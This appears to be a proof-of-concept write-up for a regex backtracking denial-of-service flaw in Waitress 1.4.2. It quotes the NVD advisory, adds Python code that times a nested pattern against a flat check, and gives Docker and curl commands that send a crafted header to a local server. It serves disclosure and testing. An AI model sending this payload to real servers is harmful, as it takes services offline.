Waitress version 1.4.2 allows a DOS attack when waitress receives a header that contains invalid characters. When a header like "Bad-header: xxxxxxxxxxxxxxx\x10" is received, it will cause the regular expression engine to catastrophically backtrack causing the process to use 100% CPU time and blocking any other interactions. This allows an attacker to send a single request with an invalid header and take the service offline.
by NVD
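The backtracking behaviour described above can be measured with the added example below, which is not code from this repository or from Waitress. `NESTED` is a constructed pattern standing in for the vulnerable shape, `FLAT` is a simplified single-pass check, and all function names are assumptions made for the illustration.

```python
import re
import time

# Constructed pattern with a quantifier nested inside a quantifier.
# Illustrative only: this is NOT the expression used in Waitress.
NESTED = re.compile(r"(?:[\x21-\x7e]+)*$")

# One flat character class under a single quantifier: no ambiguity, so a
# failed match is found in one pass. Simplified from the RFC 7230
# field-value alphabet (HTAB, SP, VCHAR, obs-text).
FLAT = re.compile(r"[\t\x20-\x7e\x80-\xff]*")


def header_value_ok(value):
    """Accept a header value only if every character is in the flat class."""
    return FLAT.fullmatch(value) is not None


def match_seconds(pattern, value, repeat=3):
    """Best-of-N wall time for one full match attempt."""
    best = float("inf")
    for _ in range(repeat):
        start = time.perf_counter()
        pattern.fullmatch(value)
        best = min(best, time.perf_counter() - start)
    return best


def growth(pattern, short=10, long=18):
    """How much slower a rejected value gets when it grows from short to long."""
    def bad(n):
        return "x" * n + "\x10"  # constructed input: valid run, then a control byte
    return match_seconds(pattern, bad(long)) / match_seconds(pattern, bad(short))


if __name__ == "__main__":
    print("nested pattern, 10 -> 18 chars: x%.0f" % growth(NESTED))
    print("flat pattern,   10 -> 18 chars: x%.1f" % growth(FLAT))
    print("flat check accepts bad value:", header_value_ok("x" * 33 + "\x10"))
```

With the nested pattern each extra character roughly doubles the time needed to reject the value, while the flat class rejects it in a single scan regardless of length.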
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"
To show CPU usage for the server, exec "docker stats waitress".
↓ Exec PoC